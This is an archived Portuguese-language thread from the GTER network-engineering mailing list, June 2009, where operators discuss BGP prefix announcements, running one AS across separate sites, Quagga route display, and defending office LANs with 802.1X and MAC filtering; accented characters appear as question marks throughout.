CIDRs privados de quem ? cheio de >> frescura para aceitar meus an?ncios. > > "(...) be conservative in what you do, be liberal in what you accept > from others." > Robustness Principle, Jon Postel > RFC 793, "TRANSMISSION CONTROL PROTOCOL DARPA INTERNET PROGRAM > PROTOCOL SPECIFICATION" ? por a? mesmo. eu recebia 10/8 e os outros blocos BCP-5 da embratel. foi s? avis?-los que no dia seguinte desapareceram. From guhcampos at gmail.com Sun Jun 14 10:24:13 2009 From: guhcampos at gmail.com (Gustavo Campos) Date: Sun, 14 Jun 2009 10:24:13 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <6bb5f5b10906131812o201f4fdbn346d873170b723ab@mail.gmail.com> References: <1c499e9d0906130921r65d96b77k97d223169badafca@mail.gmail.com> <6bb5f5b10906131812o201f4fdbn346d873170b723ab@mail.gmail.com> Message-ID: <19834d100906140624x686178a1gf54a467bb39b8d2b@mail.gmail.com> A? vai uma opini?o pol?mica que eu tenho. NA verdade n?o diria que ? minha opini?o, mas mais uma hip?tese que eu venho filosofando. Hoje em dia existe uma certa paran?ia sobre essa quest?o de an?ncios de rotas. Muita gente brigando com muita gente por an?ncios pequenos, filtros errados e coisa e tal, mas ser? que ? motivo pra tanta guerra assim? Em primeiro lugar, quase ningu?m realmente precisa fazer roteamento completo. Tem muita gente a? falando BGP e fazendo full routing simplesmente porque pode, porque o equipamento aguenta e acham legal. A maioria dessas pessoas (ou empresas) estaria perfeitamente servida por uma tabela parcial. Mas a? v?m os grandes provedores: esses sim precisam se preocupar com o tamanho total da tabela de roteamento, afinal isso gera custo pra eles: novos equipamentos, e equipamentos caros. Muito bem, n?s estamos numa (eterna?) fase de transi??o entre IPV4 e IPV6.Eu sou t?o c?tico com rela??o ao IPV6 quanto boa parte de voc?s, e ?s vezes tamb?m tenho a impress?o de que ? mais f?cil o mundo inteiro usar nat do que de fato se converterem ao IPV6, mas pelo menos em tese, a tend?ncia a longo prazo ? a convers?o. Bem, quando o IPV6 finalmente pegar, espera-se que todos os dispositivos conectados ? Internet possuam um endere?o de IP ?nico e v?lido. Isso d? uma quantidade descomunal de endere?os, at? mesmo levando em conta os dispositivos que j? existem. Eu estou bem por fora de como funciona em detalhes o Interdomain Routing pra IPV6, mas tenho a sincera impress?o de que, uma vez que estivermos nesse mundo, a tabela de roteamento global vai ficar algumas centenas de vezes maior do que ? hoje, e isso j? imaginando que as divulga??es sejam as mais conservadoras poss?veis. T? mas o que ? que tem ent?o? Bem, eu acredito que talvez seja a hora do pessoal come?ar a olhar pra frente e parar de se preocupar com coisas "pequenas" como a quantidade de /24 na rede, j? que num mundo IPV6 o buraco seria muito mais embaixo... e de fato o aumento da tabela pela inje??o de prefixos menores sirva de incentivo pro pessoal come?ar a renovar os equipamentos, rever as configura??es, os filtros e as estrat?gias de roteamento. Bem, isso ? s? uma viagem, mas por mais viagem que seja eu n?o consigo pensar que seja completamente sem fundamento =) On Sat, Jun 13, 2009 at 10:12 PM, Rubens Kuhl wrote: >> Eu recebo an?ncios 10.0.0.0/8 e outras CIDRs privados de quem ? cheio de >> frescura para aceitar meus an?ncios. > > "(...) be conservative in what you do, be liberal in what you accept > from others." > Robustness Principle, Jon Postel > RFC 793, "TRANSMISSION CONTROL PROTOCOL DARPA INTERNET PROGRAM > PROTOCOL SPECIFICATION" > > > > Rubens > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- -- Gustavo Campos Sistemas de Informa??o - UFMG From eduardo.andrez at gmail.com Sun Jun 14 14:45:10 2009 From: eduardo.andrez at gmail.com (Andrez) Date: Sun, 14 Jun 2009 14:45:10 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <4A3500C0.3010205@cyberweb.com.br> References: <4A34D0DD020000460002041B@svntrf311.trf3.jus.br> <4A3500C0.3010205@cyberweb.com.br> Message-ID: <1c499e9d0906141045qf2b9ef6yd802dae5c731cc84@mail.gmail.com> Juliano, 2009/6/14 Juliano Primavesi - Cyberweb Networks > > De fato, cabe a cada um aceitar ou filtrar determinados tamanhos de > anuncios... desde que com um default-route na retaguarda. > N?o penso assim n?o. Quem tem Full Routing ? pra usar como Full Routing. Default route nos tira, ou pelo menos atrapalha, algumas coisas como reverse path check em alguns equipamentos. Alguns usam default route para null, o que parece coerente, n?o acha? Ca?mos no que ?, a meu ver, uma terra sem lei. A Internet. Recomenda??es, especifica??es e toda a documenta??o dispon?vel parece n?o ser suficiente para termos servi?os padronizados. Estou falando que recebi essas redes privadas de uma das maiores operadoras do pa?s. Isso deveria valer alguma puni??o. Mas quem regulamenta? Tivemos casos recentes de comprometimentos graves da Internet porque um man? configurou prepends de mais, todos devem lembrar. Como isso n?o tem jeito vamos falar dos /24. Se fosse regra e essa regra fosse cumprida, poder?amos assumir que aceitando /20 ter?amos rota para todos os destinos, mesmo que com alguns poss?veis pequenos problemas. Isso permitiria que quem n?o gosta, n?o quer ou tem problemas de fato em receber tantos prefixos pudesse rejeita-los sem comprometimento. Ou indo mais al?m poderia ser solicitado a operadora que filtrassem esses an?ncios para clientes com equipamentos mais modestos. No entanto j? vi redes de enlaces usadas por operadoras que n?o s?o anunciadas. Como que tenho um IP p?blico e o mundo n?o me pinga?????? Conta r?pida: Tenho 284000 Somando de /21 a /24 tenho 221000 Sobrariam 63000 prefixos >= /20 Sou a favor da regulamenta??o e organiza??o dessa bagun?a. Pelo menos desse assunto da discuss?o corrente, das communities, dos DNS e do EMAIL. -- Atenciosamente. Eduardo Andrez de Oliveira. From juliano at cyberweb.com.br Sun Jun 14 16:37:01 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Sun, 14 Jun 2009 16:37:01 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <1c499e9d0906141045qf2b9ef6yd802dae5c731cc84@mail.gmail.com> References: <4A34D0DD020000460002041B@svntrf311.trf3.jus.br> <4A3500C0.3010205@cyberweb.com.br> <1c499e9d0906141045qf2b9ef6yd802dae5c731cc84@mail.gmail.com> Message-ID: <4A35515D.8010501@cyberweb.com.br> Andrez, Sim sim, ? fato... mas vale lembrar tamb?m que algumas aloca??es foram FEITAS em /24 ou /22, nao cabendo ao dono dos CIDRs a sua quebra. Juliano Andrez escreveu: > Juliano, > > 2009/6/14 Juliano Primavesi - Cyberweb Networks > > >> De fato, cabe a cada um aceitar ou filtrar determinados tamanhos de >> anuncios... desde que com um default-route na retaguarda. >> >> > > > N?o penso assim n?o. Quem tem Full Routing ? pra usar como Full Routing. > Default route nos tira, ou pelo menos atrapalha, algumas coisas como reverse > path check em alguns equipamentos. Alguns usam default route para null, o > que parece coerente, n?o acha? > > Ca?mos no que ?, a meu ver, uma terra sem lei. A Internet. > > Recomenda??es, especifica??es e toda a documenta??o dispon?vel parece n?o > ser suficiente para termos servi?os padronizados. > > Estou falando que recebi essas redes privadas de uma das maiores operadoras > do pa?s. Isso deveria valer alguma puni??o. Mas quem regulamenta? Tivemos > casos recentes de comprometimentos graves da Internet porque um man? > configurou prepends de mais, todos devem lembrar. Como isso n?o tem jeito > vamos falar dos /24. > > Se fosse regra e essa regra fosse cumprida, poder?amos assumir que aceitando > /20 ter?amos rota para todos os destinos, mesmo que com alguns poss?veis > pequenos problemas. Isso permitiria que quem n?o gosta, n?o quer ou tem > problemas de fato em receber tantos prefixos pudesse rejeita-los sem > comprometimento. Ou indo mais al?m poderia ser solicitado a operadora que > filtrassem esses an?ncios para clientes com equipamentos mais modestos. > > No entanto j? vi redes de enlaces usadas por operadoras que n?o s?o > anunciadas. Como que tenho um IP p?blico e o mundo n?o me pinga?????? > > Conta r?pida: > Tenho 284000 > Somando de /21 a /24 tenho 221000 > Sobrariam 63000 prefixos >= /20 > > Sou a favor da regulamenta??o e organiza??o dessa bagun?a. Pelo menos desse > assunto da discuss?o corrente, das communities, dos DNS e do EMAIL. > > > From jarruda-gter at jarruda.com Sun Jun 14 21:35:54 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Sun, 14 Jun 2009 20:35:54 -0400 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: References: <4A33AE1B.7010106@jarruda.com> Message-ID: <4A35976A.5060608@jarruda.com> Danton Nunes wrote: > On Sat, 13 Jun 2009, Julio Arruda wrote: > >> Curiosidade, fgrep zebra so mostra as rotas que se aprende via BGP ? > > exatamente. > -- Aqui em casa nao e' o caso, ele mostra tambem as rotas via ospf, aprendidas de um dos openwrt, coisa de doido nao ? root at tsunade:~# ip route show 192.168.4.0/24 via 192.168.1.4 dev eth0 proto zebra metric 20 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.15 xx.xx.xx.0/23 via 192.168.1.4 dev eth0 proto zebra metric 20 169.254.0.0/16 dev eth0 scope link metric 1000 default via 192.168.1.4 dev eth0 metric 100 A rota 192.168.4.0 e' uma interface privada no openwrt e xx.xx.xx.0/23 e' dhcp no mesmo router, aprendido via OSPF, e aparece como zebra.. Em outra maquina linux aqui: 192.168.4.0/24 via 192.168.1.4 dev eth1 proto zebra metric 20 192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.44 xx.xx.xx.0/23 via 192.168.1.4 dev eth1 proto zebra metric 20 default via 192.168.1.4 dev eth1 proto zebra Sera que o /31 nao e' um anuncio de IGP do router de borda ? From lscrlstld at gmail.com Mon Jun 15 10:58:12 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Mon, 15 Jun 2009 10:58:12 -0300 Subject: [GTER] RES: excesso de /24's e blocos menores anunciados In-Reply-To: <4A35976A.5060608@jarruda.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> Message-ID: <9AF93EA9FC344E01B38F468120A894B7@toledoPC> > Danton Nunes wrote: > > On Sat, 13 Jun 2009, Julio Arruda wrote: > > > >> Curiosidade, fgrep zebra so mostra as rotas que se aprende > via BGP ? > > > > exatamente. > > -- > > > Aqui em casa nao e' o caso, ele mostra tambem as rotas via ospf, > aprendidas de um dos openwrt, coisa de doido nao ? > Tive um caso parecido de aprendizagem de rota n?o desejado, mas foi um daemon RIP solto na rede. From jarruda-gter at jarruda.com Mon Jun 15 11:03:00 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Mon, 15 Jun 2009 10:03:00 -0400 Subject: [GTER] RES: excesso de /24's e blocos menores anunciados In-Reply-To: <9AF93EA9FC344E01B38F468120A894B7@toledoPC> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <9AF93EA9FC344E01B38F468120A894B7@toledoPC> Message-ID: <4A365494.8010002@jarruda.com> Toledo, Luis Carlos wrote: >> Danton Nunes wrote: >>> On Sat, 13 Jun 2009, Julio Arruda wrote: >>> >>>> Curiosidade, fgrep zebra so mostra as rotas que se aprende >> via BGP ? >>> exatamente. >>> -- >> >> Aqui em casa nao e' o caso, ele mostra tambem as rotas via ospf, >> aprendidas de um dos openwrt, coisa de doido nao ? >> > > Tive um caso parecido de aprendizagem de rota n?o desejado, mas foi um > daemon RIP solto na rede. > Na verdade, eu quero que aprenda via OSPF, so comentei que no meu quagga, ip route show mostra rotas NAO BGP sendo listadas como 'zebra'... > -- > gter list https://eng.registro.br/mailman/listinfo/gter From danton at inexo.com.br Mon Jun 15 11:12:59 2009 From: danton at inexo.com.br (Danton Nunes) Date: Mon, 15 Jun 2009 11:12:59 -0300 (BRT) Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <4A35976A.5060608@jarruda.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> Message-ID: On Sun, 14 Jun 2009, Julio Arruda wrote: > Danton Nunes wrote: >> On Sat, 13 Jun 2009, Julio Arruda wrote: >> >>> Curiosidade, fgrep zebra so mostra as rotas que se aprende via BGP ? >> >> exatamente. >> -- > > > Aqui em casa nao e' o caso, ele mostra tambem as rotas via ospf, aprendidas > de um dos openwrt, coisa de doido nao ? meu quagga s? opera com bgp, porisso o fgrep s? mostra rotas bgp. as rotas para dentro s?o est?ticas. para ver s? as rotad bgp mesmo o melhor ? conectar com o bgpd e dar um 'show ip bgp'. From lscrlstld at gmail.com Mon Jun 15 11:13:10 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Mon, 15 Jun 2009 11:13:10 -0300 Subject: [GTER] RES: RES: excesso de /24's e blocos menores anunciados In-Reply-To: <4A365494.8010002@jarruda.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com><9AF93EA9FC344E01B38F468120A894B7@toledoPC> <4A365494.8010002@jarruda.com> Message-ID: <5BDAFEE15A784B0EB68010A3918C9B91@toledoPC> > Na verdade, eu quero que aprenda via OSPF, so comentei que no > meu quagga, ip route show mostra rotas NAO BGP sendo listadas > como 'zebra'... S? comentei tb, e sim o ip route show vai mostrar todas as rotas din?mica/est?ticas. No meu box linux de testes (iproute2), "ip ro show proto gated/bgp" se quiser ver s? BGPs. Abs From frederick at dahype.org Mon Jun 15 11:58:57 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 15 Jun 2009 10:58:57 -0400 Subject: [GTER] BGP Diferentes localidades Message-ID: Pessoal, surgiu uma d?vida aqui, onde o consultor da operadora disse n?o ser poss?vel. Veja s?, tenho o AS funcionando corretamente com as Operadoras A e B no datacenter A. Para simplificar, suponha que do /20, somente 2 x/24 sejam anunciados no datacenter A. Agora temos tamb?m outro datacenter,B, em outra cidade. A id?ia ? usar, vamos supor, mais 2 x /24, diferentes dos primeiros, Nesta outra cidade. Nesta oepradora seremos atendidos tamb?m pela Operadora A e por uma terceira. O consultor informou que n?o ? poss?vel configurar o BGP no novo site B porque j? temos uma sess?o BGP no datacenter A com eles. Isto procede? N?o entendi a limita??o, vai ser mais uma sess?o BGP com outro endere?o de loopback, a ?nica coisa ? que o ASN ? o mesmo, mas isto j? ocorre de maneira semelhante no datacenter A, obviamente a diferen?a ? s? o endere?o f?sico que ? o mesmo. Seria um mal entendido entre as partes ou ? uma limita??o existente no provedor? Gostaria do coment?rio dos especialistas aqui no assunto :) Abra?os! From eschoedler at viavale.com.br Mon Jun 15 13:07:57 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Mon, 15 Jun 2009 13:07:57 -0300 Subject: [GTER] BGP Diferentes localidades References: Message-ID: Renato Aqui eu uso assim: Tenho um AS XXXXX rodando no Datacenter A, anunciando 1 bloco /22 + 1 bloco /23 + alguns /24. Em outras localidades (cidades), tenho POPs com router cisco e rodando BGP com a mesma operadora que tenho no datacenter, com o mesmo AS XXXXX. A operadora em quest?o ? a BRT, mas j? tive o mesmo setup com Embratel tamb?m. N?o vejo porque n?o aceitarem. Deve ser uma limita??o por pol?tica da sua operadora, n?o do bgp. Abra?os, Eduardo. ----- Original Message ----- From: "Renato Frederick" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Monday, June 15, 2009 11:58 AM Subject: [GTER] BGP Diferentes localidades Pessoal, surgiu uma d?vida aqui, onde o consultor da operadora disse n?o ser poss?vel. Veja s?, tenho o AS funcionando corretamente com as Operadoras A e B no datacenter A. Para simplificar, suponha que do /20, somente 2 x/24 sejam anunciados no datacenter A. Agora temos tamb?m outro datacenter,B, em outra cidade. A id?ia ? usar, vamos supor, mais 2 x /24, diferentes dos primeiros, Nesta outra cidade. Nesta oepradora seremos atendidos tamb?m pela Operadora A e por uma terceira. O consultor informou que n?o ? poss?vel configurar o BGP no novo site B porque j? temos uma sess?o BGP no datacenter A com eles. Isto procede? N?o entendi a limita??o, vai ser mais uma sess?o BGP com outro endere?o de loopback, a ?nica coisa ? que o ASN ? o mesmo, mas isto j? ocorre de maneira semelhante no datacenter A, obviamente a diferen?a ? s? o endere?o f?sico que ? o mesmo. Seria um mal entendido entre as partes ou ? uma limita??o existente no provedor? Gostaria do coment?rio dos especialistas aqui no assunto :) Abra?os! -- gter list https://eng.registro.br/mailman/listinfo/gter From danton at inexo.com.br Mon Jun 15 14:26:19 2009 From: danton at inexo.com.br (Danton Nunes) Date: Mon, 15 Jun 2009 14:26:19 -0300 (BRT) Subject: [GTER] BGP Diferentes localidades In-Reply-To: References: Message-ID: On Mon, 15 Jun 2009, Renato Frederick wrote: > Veja s?, tenho o AS funcionando corretamente com as Operadoras A e B no > datacenter A. Para simplificar, suponha que do /20, somente 2 x/24 sejam > anunciados no datacenter A. > > Agora temos tamb?m outro datacenter,B, em outra cidade. A id?ia ? usar, > vamos supor, mais 2 x /24, diferentes dos primeiros, Nesta outra cidade. > Nesta oepradora seremos atendidos tamb?m pela Operadora A e por uma > terceira. se n?o houver cominica??o direta entre os dois datacentres, isto ?, sem passar por outros sistemas aut?nomos, no meu entender, cada um deveria ser um sistema aut?nomo diferente. > O consultor informou que n?o ? poss?vel configurar o BGP no novo site B > porque j? temos uma sess?o BGP no datacenter A com eles. note o conceito de sistema aut?nomo. ele deve ser capaz de receber QUALQUER pacote para o AS inteiro e rote?-lo internamente. A? vale o que eu disse acima. De qualquer forma como o operador n?o sabe se voc? ? ou n?o topologicamente conexo, ele pode sim estabelecer outra sess?o com o mesmo AS. Mas lembre-se de que as rotas BGP s?o para sistemas aut?nomos, ent?o, repetindo, se o site A n?o souber rotear para o site B, a chance de dar besteira ? bem grande. > Isto procede? N?o entendi a limita??o, vai ser mais uma sess?o BGP com > outro endere?o de loopback, a ?nica coisa ? que o ASN ? o mesmo, mas > isto j? ocorre de maneira semelhante no datacenter A, obviamente a > diferen?a ? s? o endere?o f?sico que ? o mesmo. n?o procede. > Seria um mal entendido entre as partes ou ? uma limita??o existente no > provedor? pregui?a explica melhor. como a coisa sai um pouquinho do be-a-b? que eles est?o acostumados, ? mais f?cil inventar uma desculpa do que consultar o manual. > Gostaria do coment?rio dos especialistas aqui no assunto :) bem, n?o sei se j? disse isto antes ;-) mas os dois sites tem que ser capazes de rotear qualquer coisa entre eles (nem que seja por meio de t?neis). O ?nico caso de um mesmo sistema aut?nomo formando ilhas desconexas s?o os esquemas de anycast em IPv4, como ? o caso do AS 26415. From frederick at dahype.org Mon Jun 15 13:56:54 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 15 Jun 2009 12:56:54 -0400 Subject: [GTER] RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: Ola Eduardo. A id?ia ? nesta outra localidade come?ar a usar os Ip's associados ao AS, j? que a operadora n?o oferece condi??es comerciais atrativas e j? fazer a migra??o de IP's uma vez s?, visto que se trocar de operadora esta migra??o teria que ocorrer, ent?o j? faz de uma vez para os blocos do AS. Pode acontecer de ser uma limita??o imposta comercialmente at? para mitigar este cancelamento de link. A outra operadora ? Embratel e tamb?m desconhece esta limita??o, mas a id?ia ? ainda usar a antiga operadora algum tempo at? a Embratel poder oferecer a velocidade desejada, o que ainda envolve troca do meio de acesso, deve levar um tempo. Obrigado pelo feedback, vou ver o que consigo. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Eduardo Schoedler > Enviada em: segunda-feira, 15 de junho de 2009 13:08 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] BGP Diferentes localidades > > Renato > > Aqui eu uso assim: > > Tenho um AS XXXXX rodando no Datacenter A, anunciando 1 bloco /22 + 1 > bloco /23 + alguns /24. > Em outras localidades (cidades), tenho POPs com router cisco e rodando > BGP > com a mesma operadora que tenho no datacenter, com o mesmo AS XXXXX. > > A operadora em quest?o ? a BRT, mas j? tive o mesmo setup com Embratel > tamb?m. > > N?o vejo porque n?o aceitarem. > Deve ser uma limita??o por pol?tica da sua operadora, n?o do bgp. > > Abra?os, > Eduardo. > > > ----- Original Message ----- > From: "Renato Frederick" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Monday, June 15, 2009 11:58 AM > Subject: [GTER] BGP Diferentes localidades > > > Pessoal, surgiu uma d?vida aqui, onde o consultor da operadora disse > n?o ser > poss?vel. > > Veja s?, tenho o AS funcionando corretamente com as Operadoras A e B no > datacenter A. Para simplificar, suponha que do /20, somente 2 x/24 > sejam > anunciados no datacenter A. > > Agora temos tamb?m outro datacenter,B, em outra cidade. A id?ia ? usar, > vamos supor, mais 2 x /24, diferentes dos primeiros, Nesta outra > cidade. > Nesta oepradora seremos atendidos tamb?m pela Operadora A e por uma > terceira. > > > O consultor informou que n?o ? poss?vel configurar o BGP no novo site B > porque j? temos uma sess?o BGP no datacenter A com eles. > > Isto procede? N?o entendi a limita??o, vai ser mais uma sess?o BGP com > outro > endere?o de loopback, a ?nica coisa ? que o ASN ? o mesmo, mas isto j? > ocorre de maneira semelhante no datacenter A, obviamente a diferen?a ? > s? o > endere?o f?sico que ? o mesmo. > > Seria um mal entendido entre as partes ou ? uma limita??o existente no > provedor? > > Gostaria do coment?rio dos especialistas aqui no assunto :) > > Abra?os! > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From alexandre at onda.psi.br Mon Jun 15 15:54:45 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Mon, 15 Jun 2009 15:54:45 -0300 Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= Message-ID: <4A3698F5.9090804@onda.psi.br> Boa tarde !! Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me explicou a seguinte situa??o: - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp na rede onde atribui ips automaticamente... esta maquina vai ficar fora do DOMINIO da rede sem acesso a documentos etc etc.. a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar nada, mesmo a pessoa colocando um ip manualmente... para este caso sugeri autentica??o via 802.1x de todas as esta??es, incluindo o switch fazer a autentica??o em um servidor central de chaves usando radius... existem outras possibilidades ? uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar quais macs podem conectar fisicamente naquelas portas ? resumindo, ele precisa permitir conexao fisica somente a maquinas autorizadas .. alguem conhece alguma solu??o ? obrigado !! -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 READY ! From edinilson at atinet.com.br Mon Jun 15 16:03:23 2009 From: edinilson at atinet.com.br (Edinilson - ATINET) Date: Mon, 15 Jun 2009 16:03:23 -0300 Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= References: <4A3698F5.9090804@onda.psi.br> Message-ID: Pode se ADICIONAR, aos itens que ja mencionou: 1o) VLANs; 2o) Dependendo do SO, desligar o arp dos servidores/estacoes (sendo que, neste caso, devera trabalhar com mac estatico, o que ? bem trabalhoso numa rede local). Sao somente sugestoes... Edinilson --------------------------------------------------------- ATINET-Professional Web Hosting Tel Voz: (0xx11) 4412-0876 http://www.atinet.com.br ----- Original Message ----- From: "Alexandre J. Correa - Onda Internet" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Monday, June 15, 2009 3:54 PM Subject: [GTER] seguran?a de acesso fisico na rede Boa tarde !! Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me explicou a seguinte situa??o: - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp na rede onde atribui ips automaticamente... esta maquina vai ficar fora do DOMINIO da rede sem acesso a documentos etc etc.. a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar nada, mesmo a pessoa colocando um ip manualmente... para este caso sugeri autentica??o via 802.1x de todas as esta??es, incluindo o switch fazer a autentica??o em um servidor central de chaves usando radius... existem outras possibilidades ? uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar quais macs podem conectar fisicamente naquelas portas ? resumindo, ele precisa permitir conexao fisica somente a maquinas autorizadas .. alguem conhece alguma solu??o ? obrigado !! -- Sds. Alexandre Jeronimo Correa Onda Internet www.onda.net.br IPV6 READY ! -- gter list https://eng.registro.br/mailman/listinfo/gter From danton at inexo.com.br Mon Jun 15 16:05:40 2009 From: danton at inexo.com.br (Danton Nunes) Date: Mon, 15 Jun 2009 16:05:40 -0300 (BRT) Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: <4A3698F5.9090804@onda.psi.br> References: <4A3698F5.9090804@onda.psi.br> Message-ID: On Mon, 15 Jun 2009, Alexandre J. Correa - Onda Internet wrote: > Boa tarde !! > > Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me > explicou a seguinte situa??o: > > - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp na > rede onde atribui ips automaticamente... esta maquina vai ficar fora do > DOMINIO da rede sem acesso a documentos etc etc.. > > a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar > nada, mesmo a pessoa colocando um ip manualmente... > > para este caso sugeri autentica??o via 802.1x de todas as esta??es, incluindo > o switch fazer a autentica??o em um servidor central de chaves usando > radius... > > existem outras possibilidades ? creio que seja a melhor op??o. chato, mas seguro. > uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar > quais macs podem conectar fisicamente naquelas portas ? sim, mas como endere?o MAC pode ser alterado a bel prazer do dono do computador com um 'ifconfiguinho' bem sem vergonha, isso fica muito fraco para o n?vel aparente de paran?ia. > resumindo, ele precisa permitir conexao fisica somente a maquinas autorizadas > .. alguem conhece alguma solu??o ? fora do IEEE-802.1X n?o tenho a mais porca id?ia. mas afinal, o que ele tem contra o 1X? paran?ia d? trabalho! From nelson at pangeia.com.br Mon Jun 15 16:07:17 2009 From: nelson at pangeia.com.br (Nelson Murilo) Date: Mon, 15 Jun 2009 16:07:17 -0300 Subject: [GTER] =?iso-8859-1?q?seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: <4A3698F5.9090804@onda.psi.br> References: <4A3698F5.9090804@onda.psi.br> Message-ID: <20090615190717.GT1741@pangeia.com.br> On Mon, Jun 15, 2009 at 03:54:45PM -0300, Alexandre J. Correa - Onda Internet wrote: > uma outra solu??o que ele me questionou foi: Existe uma maneira de > filtrar quais macs podem conectar fisicamente naquelas portas ? Certamente que pode. Mas um atacante tambem pode forjar o mac de uma maquina autorizada. ./nelson -murilo -url http://ysts.org From lscrlstld at gmail.com Mon Jun 15 16:18:52 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Mon, 15 Jun 2009 16:18:52 -0300 Subject: [GTER] RES: RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: > Ola Eduardo. > > A id?ia ? nesta outra localidade come?ar a usar os Ip's > associados ao AS, j? que a operadora n?o oferece condi??es > comerciais atrativas e j? fazer a migra??o de IP's uma vez > s?, visto que se trocar de operadora esta migra??o teria que > ocorrer, ent?o j? faz de uma vez para os blocos do AS. ? esse o ponto... O comercial das operadora j? antecipou sua id?ia. From welisson at conectcor.com.br Mon Jun 15 16:26:56 2009 From: welisson at conectcor.com.br (Welisson) Date: Mon, 15 Jun 2009 16:26:56 -0300 Subject: [GTER] Problemas com Link Telefonica In-Reply-To: References: Message-ID: <4A36A080.5070105@conectcor.com.br> Boa tarde a todos, Algu?m est? com dificuldades ou sem acesso com link telefonica ou telefonia, no interior do estado SP. mas precisamente na regi?o de Bauru. Att. Welisson Tom? From frederick at dahype.org Mon Jun 15 17:41:33 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 15 Jun 2009 16:41:33 -0400 Subject: [GTER] RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: > note o conceito de sistema aut?nomo. ele deve ser capaz de receber > QUALQUER pacote para o AS inteiro e rote?-lo internamente. A? vale o > que > eu disse acima. De qualquer forma como o operador n?o sabe se voc? ? ou > n?o topologicamente conexo, ele pode sim estabelecer outra sess?o com o > mesmo AS. Mas lembre-se de que as rotas BGP s?o para sistemas > aut?nomos, > ent?o, repetindo, se o site A n?o souber rotear para o site B, a chance > de > dar besteira ? bem grande. > Entao Danton, acontece que eles n?o comunicam entre si n?o. A realidade ? esta, a outra localidade ? bem menor e um /24 atende. N?o justifica solicitar um AS para l?, mas tamb?m ela n?o tem conex?o com o ponto principal. Na verdade nem interessa ter conex?o com o ponto principal, seria interessante usar l? como redund?ncia f?sica, mas ? invi?vel montar um link entre os 2 Ent?o pensei que se eu divulgasse uma rede /24 somente l?(mais uma vez, estou dando exemplo /24, pode ser /23, ainda n?o cheguei a um consenso), e no site principal todas as redes menos esta, funcionaria, j? que para a Internet eu teria um /24 chegando a partir do AS que atende o provedor l? e o restante das redes chegando a partir do AS dos outros provedores que atendem aqui. Mas e se for o mesmo provedor tanto l? quanto aqui? Tecnicamente, dentro do backbone deles, eles saberiam direcionar a requisi??o para aquele IP a partir da outra sess?o BGP? Eu creio que sim, mas da? que surgiu minha d?vida! From frederick at dahype.org Mon Jun 15 18:10:45 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 15 Jun 2009 17:10:45 -0400 Subject: [GTER] RES: RES: RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: Mas n?o tem problema, se tecnicamente n?o houver problema(mesma operadora com 2 sessoes BGP do mesmo AS, a partir de endere?os de loopback diferentes), procuramos alternativas com operadoras mais amig?veis! > ? esse o ponto... O comercial das operadora j? antecipou sua id?ia. > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From danton at inexo.com.br Mon Jun 15 20:43:49 2009 From: danton at inexo.com.br (Danton Nunes) Date: Mon, 15 Jun 2009 20:43:49 -0300 (BRT) Subject: [GTER] RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: On Mon, 15 Jun 2009, Renato Frederick wrote: > Entao Danton, acontece que eles n?o comunicam entre si n?o. ent?o d? um jeito de comunicar, p.ex. t?nel. se eles n?o formam um todo conexo n?o deveriam ficar no mesmo AS. Pela defini??o da RFC1930: An AS is a connected group of one or more IP prefixes run by one or more network operators which has a SINGLE and CLEARLY DEFINED routing policy. 